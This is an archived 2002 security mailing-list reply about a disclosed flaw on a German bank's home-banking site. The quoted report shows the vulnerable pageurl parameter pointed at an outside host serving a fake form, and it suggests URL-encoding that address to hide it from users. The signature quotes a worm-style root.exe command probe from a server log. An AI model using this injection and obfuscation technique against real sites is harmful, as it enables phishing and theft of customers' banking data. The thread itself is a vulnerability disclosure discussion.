Vulnerability Development mailing list archives
Re: security issue at hypovereins bank
From: Dominik Birk <dominik () code-foundation de>
Date: Fri, 05 Apr 2002 00:51:05 +0200
At 12:12 05.04.02 +0200, hnz geeratz[room23] wrote:
hello
good evening hnz
I found this security issue on the german hypovereins bank.
I'm from Germany and there was a gap like this in the hypovereinsbank site a few months ago.
They are informed vor 3 months ago , still there is nothing changed. The security hole will allow a atacker to include his own forms in the website. This will give him an option to collect sensible information. It is a home bankin system!
I think you can call this security hole CSS (cross-site-scripting). At this moment I would like to appeal to the paper of Obscure.
http://eyeonsecurity.net/papers/Extended%20HTML%20Form%20Attack.htmThe german version is under http://www.code-foundation.de/archiv/form_attack.htm
take a look at this (long) URL: http://www.hypovereinsbank.de/pub/templates/index.jsp?pageurl=%2Fpub%2Fio%2Fkarr%2F28100.jsp&id=18&mcontext=menu now it is possible to change the pageurl=%2Fpub%2Fio%2Fkarr%2F28100.jsp&id=18&mcontext=menu part to something like pageurl=http://www.evol.org/fake_form.php ore try : http://www.hypovereinsbank.de/pub/templates/index.jsp?pageurl=http://www.google.de so it is possible to include everything in this webpage. The attacker could obscure the url in a form like: pageurl=h%74t%70%3A%2Fw%77w%77............ so the user will not notice that the include form is not from the original server
Yes, you are right. This is a really bad security hole an in my opinion it is negligent to let shit hole open. The Hypovereinsbank is a great bank in Germany.
It opens a port to a new form of social hacking and data grabbing.
ACK. I'm very astonished about the negligence of several System Admins.
greetings hnz g
Sincerely Dominik Birk -- http://www.code-foundation.de 217.229.69.207 - - [14/Oct/2001:02:29:41 +0200] "GET /MSADC/root.exe?/c+dir Microsoft? Where do you want to surf today?
Current thread:
- security issue at hypovereins bank hnz geeratz[room23] (Apr 05)
- Re: security issue at hypovereins bank Dominik Birk (Apr 05)
- <Possible follow-ups>
- Re: security issue at hypovereins bank Carlos Heller (Apr 07)